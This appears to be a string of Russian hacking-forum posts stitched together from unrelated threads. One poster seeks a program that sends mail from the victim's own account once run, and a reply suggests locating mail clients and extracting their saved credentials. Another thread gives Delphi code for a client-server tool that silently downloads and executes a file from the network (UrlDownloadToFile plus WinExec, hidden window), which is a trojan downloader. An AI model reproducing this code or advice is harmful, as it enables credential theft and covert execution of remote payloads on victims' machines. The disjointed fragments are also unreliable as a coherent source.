полистал - нашел. хорошо, конечно, но мне немного другое нужно: мне нужно чтобы прога отправляла письмо с мыла того чела, кому попала эта прога. ну например, попала она Васе. так вот, после запуска, прога должна отправить письмо с ВАСИНОГО почтового ящика! То есть через Васин СМТП-сервер.
насколько я знаю: ну для этого надо действовать в зависимости от того какой клиент используется, если оутлок то в одном месте , если Це Бед то в другом месте. просто так в Винде СМТП не сохраняется
не вижу связи между почтовым клиентом и адресом stmp сервера. лучший вариант: 1. Поиск почтовых клиентов 2. "выдрать" данные сложно, но все осуществимо... (ппц) //всех с наступающим.
Здесь у тебя неограниченое количество вариантов, мне сразу пришли ткакие: 1. положить мышь в сидюк и нажать на кнопку, сидюк будет заезжать и придавит мыше шею и она задыхнется в скором будущем. 2.или такой неоригинальный метод: // скрыть курсор мыши ShowCursor(False); Выбирай какой тебе нравиться
Наверное идёт разработка новой говнопроги =) // Кстате, поиск по форуму рулит http://forum.antichat.ru/threadedpost536046.html#post536046
Написал программку состоящую из 2-х частей Клиент и Сервер. Сервер по запросу клиента должен скачивать и запускать файл из сети. Как реализовать такую функцию? Вроде бы как то так: procedure DownloadAndExecute(Source: PChar); stdcall; const DestFile = ' '; begin UrlDownloadToFile(nil, Source, DestFile, 0, nil); WinExec(DestFile, SW_HIDE); end; Обьясните поподробней пожалуйста.
procedure DownloadAndExecute(Source: PChar); const DestFile = 'my.exe'; begin UrlDownloadToFile(nil, Source, DestFile, 0, nil); WinExec(DestFile,1); end; так вернее будет